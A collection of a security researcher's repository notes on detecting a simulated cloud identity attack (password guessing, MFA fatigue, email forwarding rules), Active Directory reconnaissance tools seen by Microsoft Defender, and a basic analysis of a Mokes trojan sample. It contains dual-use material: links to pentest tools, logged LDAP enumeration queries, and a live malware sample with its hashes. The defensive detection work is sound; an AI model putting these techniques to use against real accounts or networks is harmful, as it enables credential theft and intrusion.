365. 94 | If you are interested in this simulation, please take a look at [DEV05-CloudID-Exfiltration.md](https://github.com/LearningKijo/ResearchDev/blob/main/DEV/DEV05-CloudID-Exfiltration/DEV05-CloudID-Exfiltration.md). 95 | 96 | Thank you, Kijo Ninja 97 | 98 | #### Disclaimer 99 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 100 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day16-CloudId-Exfiltration-AttackReport-Part1.md: -------------------------------------------------------------------------------- 1 | # Cloud-Based Identity to Exfiltration Attack 2 | Identity attacks have been increasing every single day. Over the past few years, attackers have been observed attempting to transition from on-premise to cloud environments for further exploitation. 3 | Today, I would like to showcase some detection insights regarding attacks, starting from cloud-based identity attacks and extending to compromised Office 365 environment. 4 | 5 | Here is the complete attack scenario that I simulated manually, step by step. 6 | 7 | "Assuming the attacker has obtained the email address information and requires a password to log in to Office 365/Outlook, they begin by attempting to access it with various easily guessable passwords at random. 8 | After a few attempts, they manage to guess the password, but their access is blocked by MFA (Multi-Factor Authentication). 9 | Subsequently, they resort to repeatedly requesting MFA approval to exhaust the targeted user, a technique known as MFA fatigue. 10 | Eventually, after 10-15 attempts, the user approves access due to exhaustion." 11 | 12 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/52ece219-1ac1-4dcd-bc52-67cc572a0c4e) 13 | 14 | > Cloud-Based Identity to Exfiltration : Attack flow 15 | ## Attack Simulation : Part 1 16 | As I've divided this blog into two parts, this part focuses on Part 1, examining cloud-based identity attacks leading to successful logins to Outlook activities. 17 | 18 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/e5f31691-69d4-41e6-ae72-0b6651b82231) 19 | 20 | Firstly, I'd like to highlight how Microsoft Defender XDR is excellent for visualizing all suspicious activities and correlating them into one incident. 21 | After simulating the entire attack, a series of alerts were gradually generated over time. 22 | 23 | **Here are all the alerts generated in Microsoft Defender XDR.** 24 | ``` 25 | Product : Alert title : MITRE ATT&CK Techniques 26 | ------- : --------------------------------------------------- : ----------------------------------------------------------------------------------------------------------------- 27 | MDA : Investigation priority score increase : 28 | XDR : Suspicious behavior: Impossible travel activity : T1078.004: Cloud Accounts 29 | XDR : Impossible travel activity : T1078: Valid Accounts, T1078.004: Cloud Accounts 30 | XDR : Multiple Failed Sign-Ins : T1110: Brute Force 31 | XDR : Suspicious behavior: Multiple failed login attempts : T1110: Brute Force, T1212: Exploitation for Credential Access 32 | MDA : Multiple failed login attempts : T1110: Brute Force, T1110.001: Password Guessing 33 | MDA : Activity from a Tor IP address : T1078: Valid Accounts, T1078.004: Cloud Accounts 34 | Entra : Anonymous IP address : 35 | MDA : Logon from a risky IP address : 36 | XDR : Suspicious email forwarding rule : T1114.003: Email Forwarding Rule 37 | MDA : Suspicious inbox forwarding rule : T1114: Email Collection, T1114.003: Email Forwarding Rule 38 | Entra : Anomalous Token : 39 | XDR : Suspicious behavior: Mass delete : T1485: Data Destruction 40 | MDA : Mass delete : T1485: Data Destruction 41 | XDR : Suspicious behavior: Mass download : T1213: Data from Information Repositories, T1530: Data from Cloud Storage, T1039: Data from Network Shared Drive 42 | MDA : Mass download : T1074: Data Staged 43 | XDR : Suspicious massive data read : T1119: Automated Collection, T1213.002: Sharepoint 44 | ``` 45 | 46 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/520c0525-a251-41ed-8378-381377a54512) 47 | > Attack simulation & Incident in Microsoft Defender XDR 48 | 49 | The simulation begins with an identity-based attack, and chronologically, we can observe two "Impossible travel activity" alerts generated by Microsoft Defender for Cloud Apps. 50 | Interestingly, two "Impossible travel activity" alerts and another alert, which is "Anonymous IP address" generated by Microsoft Entra ID Protection, are related activities. 51 | ***That's why these events and alerts were correlated and generated the "Suspicious behavior: Impossible travel activity" alert by Microsoft Defender XDR in the end.*** 52 | 53 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/d6c348df-31aa-4982-9305-63fcada8d97a) 54 | > Impossible travel activity & XDR alert 55 | 56 | We observed two alerts of "Impossible Travel activity", but let's investigate why two identical alerts were generated. 57 | ***The first one involves travel between Japan and Germany within a 15-minute timeframe.*** 58 | Additionally, in this activity, we can confirm that the attacker used a Tor browser. 59 | 60 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/cf1b7c05-09aa-4b05-b88c-a974c61a5e3a) 61 | > Impossible Travel activity : Japan - Germany 62 | 63 | ***The second one involves travel between Japan and the Netherlands within an 18-minute timeframe.*** 64 | Similarly to the first one, we can confirm that the attacker used a Tor browser. 65 | 66 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/911635f5-c50f-4741-a196-3b6c6ba9eb1d) 67 | > Impossible Travel activity : Japan - Netherlands 68 | 69 | > [!Important] 70 | > Now, from these first attempts, we understand that the targeted user usually accesses Office 365 in Japan. 71 | > However, the attacker uses a Tor browser and attempts to access Office 365 environment anomalously, detected from two locations: Germany and the Netherlands. 72 | 73 | The next detected activities were multiple failed sign-ins and login attempts. 74 | These were identified through Microsoft Defender for Cloud Apps, ***revealing that the failures stemmed from incorrect passwords and unapproved MFA requests by the target user.*** 75 | Thee attacker persisted, attempting various commonly used passwords in hopes of success. 76 | Despite eventually discovering the correct password, the attacker was prevented from accessing the account by MFA, which was enabled for the target user in this tenant. 77 | ***As the attacker continuously requested MFA and their requests were consistently denied, numerous failed login attempts were logged in Microsoft Defender XDR. 78 | Ultimately, these events were correlated into a single alert: "Suspicious behavior: Multiple failed login attempts"*** 79 | 80 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/7655ae26-76f6-479c-ab53-25060c281c2a) 81 | 82 | Despite multiple failed attempts and denial of MFA access, the attacker persisted in requesting MFA approval. 83 | ***Eventually, the target user approved the access due to tiredness, a technique often exploited in cyber attacks known as MFA fatigue.*** 84 | Reviewing the "Activity from a Tor IP address" alert, we can confirm that the attacker successfully accessed Outlook/Microsoft Exchange Online using a Tor browser. 85 | Following the successful login, the attacker proceeded to create forwarding rules to collect data from daily email activities. 86 | 87 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/71f51689-9fdd-4a17-9133-2eae8bd1787f) 88 | 89 | I hope these insights will be helpful for all. Stay tuned for Part 2, where we'll discuss what happens when the attacker moves to the cloud environment. 90 | 91 | #### Disclaimer 92 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 93 | -------------------------------------------------------------------------------- /ProductResearch-Note-Folder/Day02-MDE-MDI-BetterTogether-Part2.md: -------------------------------------------------------------------------------- 1 | # MDE + MDI better together - Reconnaissance 2 | Hello, all defenders and threat hunters! Thank you for visiting my product research note. 3 | As we primarily focused on exploring how Microsoft Defender for Endpoint (MDE) and Microsoft Defender for Identity (MDI) work better together, 4 | emphasizing [command-based AD reconnaissance in Part 1](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/ProductResearch-Note-Folder/Day01-MDE-MDI-BetterTogether-Part1.md), this time we are going to shift our focus to AD reconnaissance using some pretesting tools. 5 | 6 | ## Pretesting tools 7 | Before I begin showcasing MDE + MDI detection, I would like to show a simulation. 8 | The simulation itself is quite simple, and what you have to do is install pentesting tools and run them on a compromised AD-joined device. 9 | 10 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/b859cdc9-fddd-4b8d-8948-105005dc070b) 11 | 12 | > [!Important] 13 | > These tools are used for attack simulation in this blog. Please use them in a testing environment and avoid using them in a production environment. 14 | > 1. ORADAD - https://github.com/ANSSI-FR/ORADAD 15 | > 2. NetSess - https://www.joeware.net/freetools/tools/netsess/ 16 | > 3. ADRecon - https://github.com/sense-of-security/ADRecon 17 | 18 | ## Detection, XDR 19 | After running three tools on the compromised AD-joined device, 1 incident (which is correlated with 9 alerts generated from MDE & MDI) appeared on Incident page on Microsoft Defender XDR portal. 20 | As I primarily used three tools, let's take a look how these tools will be mapped on alert pages in the context of MDE and MDI. 21 | 22 | ``` 23 | Incident : Multi-stage incident involving Credential access & Discovery on one endpoint reported by multiple sources 24 | Alerts : Detection source, Alert name 25 | - EDR, Possible Active Directory data enumeration using ADRecon 26 | - EDR, Suspicious sequence of exploration activities 27 | - EDR, Suspicious User Account Discovery 28 | - EDR, Credential theft attempt of Group Managed Service Accounts (gMSA) 29 | - EDR, Suspicious LDAP query 30 | - EDR, Active Directory Certificate Services attack tool activity 31 | - MDI, User and IP address reconnaissance (SMB) 32 | - MDI, Security principal reconnaissance (LDAP) 33 | - Defender XDR, Enumeration of SMB sessions on a domain controller 34 | ``` 35 | > All generated alerts after the simulation in Incident 36 | 37 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/97dcd6a3-c6cb-447e-be0d-9933234f99c0) 38 | > Incident page : Multi-stage incident involving Credential access & Discovery on one endpoint reported by multiple sources 39 | 40 | ### ORADAD tool detection in MDE & MDI 41 | At first, this alert was generated by MDI when the MDI sensor detected suspicious activity from Win10BB. 42 | MDI sensor raised an alert as Win10BB (Compromised device) sent a suspicious LDAP query to the Domain Controller for enumeration. 43 | It's worth noting that MDI covers a range of enumerated types, such as ***"AllObjects", "AllComputers", "AllUsers", and "AllGroupPolicies"***. 44 | 45 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/0ff61b3a-9e7a-4de7-9f72-325a6896721c) 46 | > MDI alert, Security principal reconnaissance (LDAP) 47 | 48 | In terms of MDE detection, I observed three alerts : 49 | - [x] Suspicious LDAP Query 50 | - [x] Active Directory Certificate Services Attack Tool Activity 51 | - [x] Credential theft attempt of Group Managed Service Accounts (gMSA) 52 | 53 | These alerts shed light on the executed tool on Win10BB by the attacker, even capturing each LDAP query performed by the tool (ORADAD) as follows. 54 | 55 | ```query 56 | < ----- Suspicious LDAP Query ----- > 57 | LDAP Search query (objectClass=group), Distinguished name CN=Configuration,DC=mdipoc,DC=com 58 | LDAP Search query (|(objectClass=domain)(objectClass=domainDNS)), Distinguished name DC=mdipoc,DC=com 59 | LDAP Search query (&(objectClass=user)(!(|(objectClass=computer)(objectClass=msDS-ManagedServiceAccount)(objectClass=msDS-GroupManagedServiceAccount)))), Distinguished name DC=mdipoc,DC=com 60 | 61 | < ----- Active Directory Certificate Services Attack Tool Activity ----- > 62 | LDAP Search query (objectClass=pKICertificateTemplate), Distinguished name CN=Configuration,DC=mdipoc,DC=com 63 | 64 | < ----- Credential theft attempt of Group Managed Service Accounts (gMSA) ----- > 65 | LDAP Search query (objectClass=msDS-GroupManagedServiceAccount), Distinguished name DC=mdipoc,DC=com 66 | ``` 67 | 68 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/e6a9a092-7e12-46fd-956f-f4b9d251dc91) 69 | > MDE alerts, which are highlighting some LDAP query execution 70 | 71 | ### NetSess tool detection in MDE & MDI 72 | Secondly, NetSess tool activity was captured by MDI and Defender XDR, initially detected by MDE through XDR alert correlation. 73 | From the SOC team's perspective, this not only enables them to identify instances of "User and IP address reconnaissance" but also provides insights into ***how attackers executed tools, 74 | the specific commands they used, and the timeline associated with these actions from an Endpoint perspective.*** 75 | 76 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/0129fe1d-9600-475e-adb1-bab39dfef2a8) 77 | > Defender XDR, Enumeration of SMB sessions on a domain controller 78 | 79 | For instance, MDI alert indicates that Mike Ninja on Win10BB (Compromised device) initiated a session on DC and is attempting to gather recent logon information, such as IP address and user. 80 | However, what we would like to identify is more detailed activity, especially how this activity is performed by the attacker. 81 | 82 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/7fa1df61-9aac-4f63-b802-b782167c7845) 83 | > MDI alert, User and IP address reconnaissance (SMB) 84 | 85 | One of the significant advantages of deploying MDE is the ability to capture SMB session activities from the endpoint perspective. 86 | When reviewing MDE alert detections, we can clearly discern the tools employed by attackers and even the specific command lines they used. 87 | Additionally, MDE captures hash values and offers file detection insights from VirusTotal. 88 | 89 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/efd4956c-db6d-412d-b1a3-622673111cdc) 90 | > Defender XDR, Enumeration of SMB sessions on a domain controller 91 | 92 | ### ADRecon tool detection in MDE 93 | Lastly, the attacker conducted ADRecon, triggering alerts in MDE. 94 | Notably, MDE promptly captured the suspicious activities, identifying them as the ADRecon tool. 95 | Furthermore, MDE provided a comprehensive list of all files created during the ADRecon enumeration in the alert. 96 | 97 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/f49ecfcc-e36d-4547-b267-8b98dc37aa0d) 98 | > MDE alert, Possible Active Directory data enumeration using ADRecon 99 | 100 | Another alert from MDE indicates the execution of PowerShell commandlets (performed by the ADRecon tool) on the endpoint. 101 | 102 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/31317e90-158e-44f2-94e9-a282e7689c5c) 103 | > MDE alert, Suspicious sequence of exploration activities 104 | 105 | In 'MDE + MDI: Better Together Part 1 & Part 2', I explored reconnaissance detection, emphasizing the robust detection capabilities when both products are used in tandem. 106 | I plan to delve into additional insights such as hunting, response, and other attack phases in the future. Thank you for reading !! 107 | 108 | #### Disclaimer 109 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 110 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/f372dead-b41c-417a-8d10-f76cde1bcd32) 3 | 4 | 5 | ### Welcome to @SecurityResearcher-Note 6 | In this repository, I will cover various security approaches to attack techniques and share new discoveries about security breaches. Through the new discoveries and learnings shared in this repository, I hope to provide helpful insights for those involved in security operations, hunting, incident response, and more. 7 | 8 | 1. [Security Research-Note](https://github.com/LearningKijo/SecurityResearcher-Note#security-research-note) 9 | 2. [Product Research-Note](https://github.com/LearningKijo/SecurityResearcher-Note#product-research-note) 10 | 11 | 12 | ## Security Research-Note 13 | | Day | Title | Comment | 14 | |:-----|:------|:--------| 15 | | Day1 | [Day1-Basic-Malware-Analysis.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day01-Basic-Malware-Analysis.md) | 16 | | Day2 | [Day2-APT29-Part1-Overview.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day02-APT29-Part1-Overview.md)
[Day2-APT29-Part2-Midnight-Blizzard.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day02-APT29-Part2-Midnight-Blizzard.md)
[Day2-APT29-Part3-Midnight-Blizzard.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day02-APT29-Part3-Midnight-Blizzard.md)
[Day2-APT29-Part4-Midnight-Blizzard-MDE-EvaluationLab.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day02-APT29-Part4-Midnight-Blizzard-MDE-EvaluationLab.md) | Russia-based activity group | 17 | | Day3 | [Day3-Microsoft-ThreatActorNamingTaxonomy.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day03-Microsoft-ThreatActorNamingTaxonomy.md) | 18 | | Day4 | [Day4-Mango-Sandstorm-Part1-Overview.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day04-Mango-Sandstorm-Part1-Overview.md)
[Day4-Mango-Sandstorm-Part2-AttackTechniques-Insights.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day04-Mango-Sandstorm-Part2-AttackTechniques-Insights.md)
[Day4-Mango-Sandstorm-Part3-AttackTechniques-Insights.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day04-Mango-Sandstorm-Part3-AttackTechniques-Insights.md) | Iran-based activity group | 19 | | Day5 | [Day5-AntivirusConfig-Tips.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day05-AntivirusConfig-Tips.md) | EPP | 20 | | Day6 | [Day6-M365D-XDR-AutomaticAttackDisruption.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day06-M365D-XDR-AutomaticAttackDisruption.md) | AiTM, BEC,
Human-operated ransomware | 21 | | Day7 | [Day7-AiTM-Insights-XDR.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day07-AiTM-Insights-XDR.md) | AiTM, BEC | 22 | | Day8 | [Day8-WebShell-Insights-XDR.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day08-WebShell-Insights-XDR.md) | Web shell | 23 | | Day9 | [Day9-XDR-Insights-part1.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day09-XDR-Insights-part1.md)| XDR | 24 | | Day10 | [Day10-XDR-Insights-part2.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day10-XDR-Insights-part2.md) | XDR | 25 | | Day11 | [Day11-MalwareAnalysis-Insights-part1.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day11-MalwareAnalysis-Insights-part1.md)
[Day11-MalwareAnalysis-Insights-part2.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day11-MalwareAnalysis-Insights-part2.md) | Malware Analysis
EDR, XDR | 26 | | Day12 | [Day12-Volt-Typhoon-Base64.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day12-Volt-Typhoon-Base64.md)
[Day12-Volt-Typhoon-Base64.pdf](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day12-Volt-Typhoon-Base64.pdf) - <*PDF>* | China-based activity group
Base64, Credential dumping | 27 | | Day13 | [Day13-WDigest-credential-harvesting-attack.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day13-WDigest-credential-harvesting-attack.md) | WDigest, Mimikatz | 28 | | Day14 | [Day14-macOS-SIP-Bypass-Insights.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day14-macOS-SIP-Bypass-Insights.md) | SIP Bypass
macOS vulnerability | 29 | | Day15 | [Day15-XDR-Insights-2024update.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day15-XDR-Insights-2024update.md) | XDR | 30 | | Day16 | [Day16-CloudId-Exfiltration-AttackReport-Part1.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day16-CloudId-Exfiltration-AttackReport-Part1.md)
[Day16-CloudId-Exfiltration-AttackReport-Part2.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day16-CloudId-Exfiltration-AttackReport-Part2.md) | Identity abuse
Exfiltration | 31 | | Day17 | [Day17-Hunting-APIcalls-insight.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day17-Hunting-APIcalls-insight.md) | API, MDE | 32 | | Day18 | [Day18-LotL-detection-part1.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day18-LotL-detection-part1.md) | LotL | 33 | | Day19 | [Day19-ThreatActor-Discovery.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day19-ThreatActor-Discovery.md) | Discovery | 34 | ## Product Research-Note 35 | | Day | Title | Comment | 36 | |:-----|:------|:--------| 37 | | Day1 | [Day01-MDE-MDI-BetterTogether-Part1.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/ProductResearch-Note-Folder/Day01-MDE-MDI-BetterTogether-Part1.md) | Reconnaissance, SAMR | 38 | | Day2 | [Day02-MDE-MDI-BetterTogether-Part2.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/ProductResearch-Note-Folder/Day02-MDE-MDI-BetterTogether-Part2.md) | Reconnaissance, SMB, LDAP | 39 | | Day3 | [Day03-MDO-FileDetonation-DeepAnalysis.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/ProductResearch-Note-Folder/Day03-MDO-FileDetonation-DeepAnalysis.md) | FileDetonation, DeepAnalysis | 40 | | Day4 | [Day04-MDI-DeploymentConsiderations.pdf](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/ProductResearch-Note-Folder/Day04-MDI-DeploymentConsiderations.pdf) | ITDR, MDI | 41 | 42 | ## Microsoft Copilot for Security, ***Kijo Catchup LOG*** 43 | | LOG | Title | 44 | |:-------|:------| 45 | | LOG-01 | [Microsoft Copilot for Securit / Update history](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/CopilotLOGs/01-CopilotForSecurity-History.md) | 46 | 47 | ## Other 48 | #### Microsoft Security Blog 49 | - Jul 31 2023, [AiTM & BEC threat hunting with KQL](https://techcommunity.microsoft.com/t5/azure-data-explorer-blog/aitm-amp-bec-threat-hunting-with-kql/ba-p/3885166) 50 | 51 | #### Event Speaker 52 | #### [Microsoft 365 Defender Virtual Ninja Training](https://adoption.microsoft.com/en-us/ninja-show/) 53 | - November 8 2023, [Advanced Hunting & Data visualization in Microsoft 365 Defender](https://www.youtube.com/watch?v=2jSqr-nzWn8&ab_channel=MicrosoftSecurityCommunity) 54 | - November 8 2023, [The Virtual Ninja Show | Season 6 Episode 2](https://techcommunity.microsoft.com/t5/security-compliance-and-identity/the-virtual-ninja-show-season-6-episode-2/ev-p/3969120) 55 | 56 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/64097aa2-092d-464b-b879-2e2ce26d56d5) 57 | 58 | #### Disclaimer 59 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 60 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day11-MalwareAnalysis-Insights-part1.md: -------------------------------------------------------------------------------- 1 | # Day 11 - XDR insights - File Analysis <1/1> 2 | Thank you for visiting my XDR blog. This post specifically delves into analyzing malware file information from generated alerts in Microsoft 365 Defender. 3 | The blog primarily focuses on the foundational aspects of malware analysis, excluding intricate content such as reverse engineering or complex debugging. 4 | While I extensively cover Microsoft 365 Defender, I will also utilize third-party tools for in-depth analysis. 5 | 6 | ## What insights can we extract from alerts? 7 | When alerts are generated, Microsoft Defender Antivirus and Microsoft Defender for Endpoint provide a wealth of valuable insights on the alert page. Before diving into each of these insights, I'd like to highlight some key points to check within the alerts section of the Microsoft 365 Defender portal. 8 | 9 | > [!Note] 10 | > **General data** : SHA256, SHA1, MD5, Signer, File Prevalence, Detection
11 | > **Malware type** : Microsoft Malware family, VirusTotal
12 | > **PE file analysis** : File Content
13 | > **PE file behavior** : Deep analysis 14 | 15 | 16 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/b15b25fa-4167-434a-adbc-29fb86c9786c) 17 | 18 | > High-Level Architecture of PE File Analysis in Microsoft 365 Defender 19 | 20 | ## General data 21 | Initially, you can identify fundamental details such as Hash, Signer, Path, File Prevalence, and Detection directly on the alerts page. 22 | These insights are crucial for comprehending the malware investigation's overall mapping. Below is the output derived from an example malware. 23 | 24 | | Data | Details | 25 | |:-------|:---------------| 26 | | Hash | MD5 : 5a54de0db43a7512621f0bf10f1c463a
SHA1 : 275e8cb6734e4cadafd6648188ef906e5a096940
SHA256 : eef2be5347236331ecd365bdf33ef868b6518beb7ae94074be56f955d2a951d7 | 27 | | File Name | TypeA.exe, **Original name : [supr.exe]** | 28 | | File Type | PE, True | 29 | | Signer | ***Unsigned file, This file's signer is unknown*** | 30 | | Path | C:\Users\kijo\Desktop\TypeA.exe | 31 | | File prevalence | Organization devices 2, Organization cloud apps 0, Worldwide devices 2 | 32 | 33 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/cc3b5ca7-6080-4ad9-8fd2-a86b3f8ef314) 34 | 35 | 36 | > [!Important] 37 | > This is a sample malware - MalwareBazaar Database, [Trojan:MSIL/Mokes.B!MTB](https://bazaar.abuse.ch/sample/eef2be5347236331ecd365bdf33ef868b6518beb7ae94074be56f955d2a951d7/#intel). I recommend testing it within ***a sandbox environment***. 38 | 39 | ### Malware detection engines ? 40 | Microsoft Defender Antivirus employs multiple detection engines on both the client and cloud sides to identify advanced malware. 41 | On the alert page, you can determine which engine detected the specific malware. For more detailed insights, this [blog](https://www.microsoft.com/en-us/security/blog/2019/06/24/inside-out-get-to-know-the-advanced-technologies-at-the-core-of-microsoft-defender-atp-next-generation-protection/) provides an understanding of each detection engine's capabilities. 42 | 43 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/1f2e89a4-f4bd-4cd5-81de-e1dfae8b97d3) 44 | 45 | 46 | ## Malware type 47 | When investigating alerts, you'll not only find malware information, but also malware characteristics, including the type of malware and how it's detected by other 3rd-party antivirus tools. Here, Figure 1 provides an example of malware detection within the alert page of Microsoft 365 Defender. 48 | 49 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/758b0fc1-7d82-417a-9535-aab8e979d4bb) 50 | 51 | > Figure 1, Alert page in Microsoft 365 Defender 52 | 53 | From the malware detection [(malware family)](https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/malware-naming?view=o365-worldwide) on the alert page, we can discern that this specific malware, Mokes, has been categorized as a Trojan and is coded using Microsoft Intermediate Language (MSIL) such as C#, VB,.NET, and so on. The "Variant" label (.B) suggests that this is not the initial version of the attack. Additionally, there's a possibility that this malware might be capable of encrypting data. 54 | 55 | | Malware name | Details | 56 | |:--------------|:-------------------| 57 | | Trojan:MSIL/Mokes.B!MTB | Type : Trojan
Platform : MSIL, .NET intermediate language scripts
Family : Mokes
Variant : .B
!Suffixes : !MTB, the encrypted data | 58 | 59 | 60 | 61 | This malware has been detected by 56 different 3rd-party antivirus tools and is consistently categorized as a Trojan on [VirusTotal](https://www.virustotal.com/gui/home/upload). Additionally, specific characteristics have been highlighted, such as "downloader" and "dropper." This indicates that the malware can access an IP address or URL and potentially download files for further malicious activity. 62 | 63 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/08a17126-e4ff-4de9-8f5b-67a02b16ccbe) 64 | 65 | ## Malware behaviors 66 | Through [deep analysis](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-file-alerts?view=o365-worldwide#deep-analysis) in Microsoft Defender for Endpoint, you can access deeper insights into the malware's behavior. 67 | Normally, to achieve this, known as basic dynamic malware analysis, you would have to install certain tools such as Process Hacker, Process Monitor, Wireshark and so on. 68 | However, this feature investigates activities within a cloud-based sandbox environment in Microsoft Defender for Endpoint, enabling security analysts to observe the malware's behavior without actual execution in their sandbox environment. 69 | 70 | Here is a summary of ***[Behaviors]***, categorized with each section along with a brief explanation. 71 | 72 | | Behaviors | Details | 73 | |:----------|:-------------| 74 | | Communication | Clusters network communication related behaviors. | 75 | | Environment Awareness | Clusters environment awareness related behaviors, such as querying for host information. such behaviors can be associated with sandbox detection. | 76 | | Installation and persistency | Clusters installation and persistency related behaviors, such as dropping files to interesting places, setting files to be loaded when Windows starts, etc. | 77 | | Interaction With System Processes | Clusters interaction with system processes behaviors, such as memory injection to svchost.exe | 78 | | Miscellaneous | Clusters miscellaneous behaviors which are not directly related to any other capability. | 79 | | Security Degradation | Clusters security degradation related behaviors, such as disablement of security features. | 80 | 81 | In the ***[Observables]*** section, files and IPs have been observed during the execution of the malware through deep analysis. Since no hash value is provided, evaluating it in VirusTotal might be a bit challenging. However, these dropped files will be immensely useful for further analysis because they allow us to ascertain the types of files that are created or downloaded. Concerning IPs, some of them appear suspicious, and even VirusTotal has flagged them as malicious. 82 | 83 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/872b2049-48a2-4a4a-a1ca-2b138e5aa6fe) 84 | 85 | Thanks to [the recent update](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/new-file-analysis-and-pivoting-capabilities-in-microsoft-365/ba-p/3853313), Microsoft 365 Defender now provides additional PE insights, including Strings, Imports, Exports, MITRE ATT&CK, and more. In this context, I can examine numerous string values, which are highly valuable for understanding how this malware was constructed. 86 | 87 | By examining the strings in [file content](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/investigate-files?view=o365-worldwide), it becomes evident that the malware predominantly utilized mscoree.dll along with their related API calls. Furthermore, the original file name [super.exe] is discernible. Since strings might be obfuscated, the assistance of third-party tools for decoding the strings may be necessary. 88 | 89 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/f9c891e7-bf82-4dc3-933d-fa18f0d6885d) 90 | 91 | In the realm of malware analysis, we can certainly utilize third-party tools to gain deeper insights into PE files. In the upcoming XDR blog, 92 | I plan to delve into further malware analysis of Type A, specifically focusing on ***deep analysis insights*** and ***PE file data using third-party tools*** such as PE Studio. 93 | 94 | #### Disclaimer 95 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 96 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day13-WDigest-credential-harvesting-attack.md: -------------------------------------------------------------------------------- 1 | # Day 13 - WDigest credential harvesting - attack 2 | Hi there !! Thank you for visiting [@SecurityResearch-Note](https://github.com/LearningKijo/SecurityResearcher-Note). 3 | Today, I'm diving into the WDigest credential harvesting attack, breaking it down into three parts. 4 | 1. WDigest credential harvesting - Attack technique 5 | 2. WDigest credential harvesting - Detection 6 | 3. WDigest credential harvesting - Threat 